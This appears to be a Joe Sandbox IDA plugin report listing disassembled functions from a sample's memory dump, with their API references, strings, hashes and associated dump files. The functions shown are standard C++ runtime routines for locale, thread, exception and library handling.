Instruction ID: 240414475ba83a703be6bba0b0a62e40812672c08006fdb53f4d344afb1bda65
Opcode Fuzzy Hash: c5514b911be63635020df5e2a2dd3c9ac482895b02f3fdcba835224cf8f410a3
Instruction Fuzzy Hash:

Function 0101AE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0101AEB3
std::_Lockit::_Lockit.LIBCPMT ref: 0101AED5
std::_Lockit::~_Lockit.LIBCPMT ref: 0101AEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 0101AF1F
std::_Lockit::_Lockit.LIBCPMT ref: 0101AF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0101AFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0101AFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 0101B088
std::_Facet_Register.LIBCPMT ref: 0101B095

Strings

bad locale name, xrefs: 0101B0AF

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: b007fec9fa70bf17bcf7a083b3d75a22ba3918e6af5114fa4e8887a352885131
Instruction ID: 1b088730a5b7a735850d0f6b2b82f94ab3a43a062e94a9937147200c284f5377
Opcode Fuzzy Hash: b007fec9fa70bf17bcf7a083b3d75a22ba3918e6af5114fa4e8887a352885131
Instruction Fuzzy Hash: 57616FB1E01245DBDF61EFA8D884BDEBBF4AF14710F144098E894AB285E739E905CB91

Function 0108C05E Relevance: 10.7, APIs: 7, Instructions: 153threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0108C086
GetCurrentThreadId.KERNEL32 ref: 0108C0A3
GetCurrentThreadId.KERNEL32 ref: 0108C0C4
GetCurrentThreadId.KERNEL32 ref: 0108C147
__Xtime_diff_to_millis2.LIBCPMT ref: 0108C15F
GetCurrentThreadId.KERNEL32 ref: 0108C18B
GetCurrentThreadId.KERNEL32 ref: 0108C1D1

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: CurrentThread$Xtime_diff_to_millis2
String ID:
API String ID: 1280559528-0
Opcode ID: ea3a3529ddd6a6e11168394ff2bfd893331f9da2e6eb37488a88a184baf929ba
Instruction ID: cee6ed03959b9d1c56d215e1eaf1ecdce900730956e2426486f74e1de1bd0735
Opcode Fuzzy Hash: ea3a3529ddd6a6e11168394ff2bfd893331f9da2e6eb37488a88a184baf929ba
Instruction Fuzzy Hash: C2518131918215CFEF21EF28C6C05E9BBF1FF0A710B154499E9C6AB285CB31E941CB64

Function 00FB3770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FB37E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB3835
__Getctype.LIBCPMT ref: 00FB384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00FB386A
std::_Lockit::~_Lockit.LIBCPMT ref: 00FB38FF

Strings

bad locale name, xrefs: 00FB391C

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: aa1b80a36cca90d85cbee2c87331fa7513abd1b91f8ddc1322a24ce38dff99fe
Instruction ID: 2bf3dc40230fb40588b2c7c57578a3429cd1b64f804d6873bd81ece7d6c8df57
Opcode Fuzzy Hash: aa1b80a36cca90d85cbee2c87331fa7513abd1b91f8ddc1322a24ce38dff99fe
Instruction Fuzzy Hash: 605183F1D043499BDF10EFA5D984BDEFBB8AF14310F144169E854AB240E775EA04DB92

Function 01090880 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 010908B7
___except_validate_context_record.LIBVCRUNTIME ref: 010908BF
_ValidateLocalCookies.LIBCMT ref: 01090948
__IsNonwritableInCurrentImage.LIBCMT ref: 01090973
_ValidateLocalCookies.LIBCMT ref: 010909C8

Strings

csm, xrefs: 0109095D

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 898e4d5caacfcc800a95fb9a43e2e308bc55c5968f9de80e292ca88134c41fc3
Instruction ID: 5baa6b7af859b4495ebfd58e2f87d6214ac5a01d7b4de08d73b14e1163ed1494
Opcode Fuzzy Hash: 898e4d5caacfcc800a95fb9a43e2e308bc55c5968f9de80e292ca88134c41fc3
Instruction Fuzzy Hash: 7841C534A0020AABDF10DF6DC894AEEBFE9AF45324F148095F9989B255D735EA01DB90

Function 010A4B87 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,010A4C96,00FB2D8D,?,00000000,?,?,?,010A4EC0,00000022,FlsSetValue,010C0AD8,010C0AE0,?), ref: 010A4C48

Strings

api-ms-, xrefs: 010A4BDE
ext-ms-, xrefs: 010A4BF2

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b64eaf34cba0462c6f7799d5416a637315cdd8c9da0f92425705bf5fdeaebc74
Instruction ID: 55da2fc3b22e5598a381cea61cedf222a1e1d8912350c6840593c37f703b5d00
Opcode Fuzzy Hash: b64eaf34cba0462c6f7799d5416a637315cdd8c9da0f92425705bf5fdeaebc74
Instruction Fuzzy Hash: F8216079500119ABD7719BA9ED50BDB37E8DB01760F590250F9DAEB285D7B0ED00C7D0

Function 0108C771 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C7BA
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C825
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C842
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C881
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C8E0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C903

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: b4ab53482a2f1b07d1007e404eb18c516220d5578d84375ec9c3b98e640ca8b8
Instruction ID: 3e600e3a5952c0efdfc3aa6e7201dc6146bea8cd96be3220b69bbb711375cbf9
Opcode Fuzzy Hash: b4ab53482a2f1b07d1007e404eb18c516220d5578d84375ec9c3b98e640ca8b8
Instruction Fuzzy Hash: 9C51BE7291420ABBFF20AFA4CD44FEA7FB9EF44750F1445A9FAD4A6190E73589108B70

Function 01019520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01019543
std::_Lockit::_Lockit.LIBCPMT ref: 01019566
std::_Lockit::~_Lockit.LIBCPMT ref: 01019586
std::_Facet_Register.LIBCPMT ref: 010195FB
std::_Lockit::~_Lockit.LIBCPMT ref: 01019613
Concurrency::cancel_current_task.LIBCPMT ref: 0101962B

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: deade354f6afa716a4a4596424888e2c3c2a9106c8582500c8d2c7cd846d32c2
Instruction ID: 3740db7322913919fe7a9297e55de8135f48e8ce5ad2786bea970593d1f6b98d
Opcode Fuzzy Hash: deade354f6afa716a4a4596424888e2c3c2a9106c8582500c8d2c7cd846d32c2
Instruction Fuzzy Hash: F441FF71900219DFCB21EF58D850AAEBBB4FF04728F144698E9C56B385D735EA00CBE0

Function 0109CBE3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C66D7777,?,?,00000000,010BACB1,000000FF,?,0109CBBF,?,?,0109CB93,00000016), ref: 0109CC18
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0109CC2A
FreeLibrary.KERNEL32(00000000,?,00000000,010BACB1,000000FF,?,0109CBBF,?,?,0109CB93,00000016), ref: 0109CC4C

Strings

CorExitProcess, xrefs: 0109CC22
mscoree.dll, xrefs: 0109CC11

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a1eab34b214e3c4df435c6bb06ac66303f72db8ce6029a5dbef0e534bd5efc0d
Instruction ID: 7bdaa97b48e56d87fc757231796ba8abea3ec78a926d18e9cb08d2bc17a7be87
Opcode Fuzzy Hash: a1eab34b214e3c4df435c6bb06ac66303f72db8ce6029a5dbef0e534bd5efc0d
Instruction Fuzzy Hash: 79012B71940659EFEB118F48DD45BEE7FF8FB04B11F004529F851A3280DB799900CB90

Function 00FB5DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00FB60F2
___std_exception_destroy.LIBVCRUNTIME ref: 00FB617F
___std_exception_copy.LIBVCRUNTIME ref: 00FB6248

Strings

recursive_directory_iterator::operator++, xrefs: 00FB61CC

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 14eded39c91c4a3deff3bef98fad6a101dc8bcdedfc20b3144c45f27eb497eee
Instruction ID: 24c8adb416ac7c1adb34e842d0080c12096e2566fcebc9f68c8c12a3b8810abd
Opcode Fuzzy Hash: 14eded39c91c4a3deff3bef98fad6a101dc8bcdedfc20b3144c45f27eb497eee
Instruction Fuzzy Hash: F0E1F2B19006059FDB28EF69C884BEEF7F9FF54700F10461DE49697680D778AA44CBA1

Function 00FB84C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00FB86DE
___std_exception_destroy.LIBVCRUNTIME ref: 00FB86ED

Strings

at line , xrefs: 00FB8518
, column , xrefs: 00FB8555, 00FB856B

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 39941d8bfd49032ced663bca33914be88bcab72f69a9aaa5d5a5c05b28566da9
Instruction ID: 56a0a4ddb285b867558992a87489955d1f478f942c2bbdf967e3ad5a9e72b478
Opcode Fuzzy Hash: 39941d8bfd49032ced663bca33914be88bcab72f69a9aaa5d5a5c05b28566da9
Instruction Fuzzy Hash: 8F614971D002059FDB08DF68CC857DEBBB6FF84310F144218E455AB781EB74AA85DB91

Function 010234C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 01023946
___std_exception_destroy.LIBVCRUNTIME ref: 0102395F
___std_exception_destroy.LIBVCRUNTIME ref: 01023A97
___std_exception_destroy.LIBVCRUNTIME ref: 01023AB0
___std_exception_destroy.LIBVCRUNTIME ref: 01023C16
___std_exception_destroy.LIBVCRUNTIME ref: 01023C2F
___std_exception_destroy.LIBVCRUNTIME ref: 01024479
___std_exception_destroy.LIBVCRUNTIME ref: 01024492

Strings

value, xrefs: 0102439F

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 7b6b666052c3d9f3496be3f06cdaf6cc3e4bd5ec24250430c2a3945ed8996329
Instruction ID: ba2fa289ac37a383c161566bea4f11ee337cc22d214a07a72977f0714f5baddd
Opcode Fuzzy Hash: 7b6b666052c3d9f3496be3f06cdaf6cc3e4bd5ec24250430c2a3945ed8996329
Instruction Fuzzy Hash: 5351E370C00258DBDF14DFA4CD84BDEBBB4BF15304F144259E499AB782DB796A88CB61

Function 00FB3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FB3C0F

Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB

Strings

ios_base::eofbit set, xrefs: 00FB3BB6
ios_base::failbit set, xrefs: 00FB3AC8, 00FB3BB1
ios_base::badbit set, xrefs: 00FB3BA7, 00FB3BD2, 00FB3BF3

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
